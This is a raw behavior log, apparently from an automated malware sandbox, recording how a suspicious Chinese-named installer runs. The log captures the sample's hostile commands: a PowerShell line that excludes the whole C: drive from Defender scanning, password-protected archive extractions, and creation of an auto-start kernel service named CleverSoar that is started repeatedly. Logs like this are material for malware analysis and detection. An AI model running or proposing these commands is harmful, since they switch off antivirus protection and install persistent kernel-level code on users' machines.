Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1148:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7916:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-96EUT.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeVirustotal: Detection: 8%
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp "C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$20442,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe"
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp "C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$302A6,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp "C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$20442,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp "C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$302A6,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
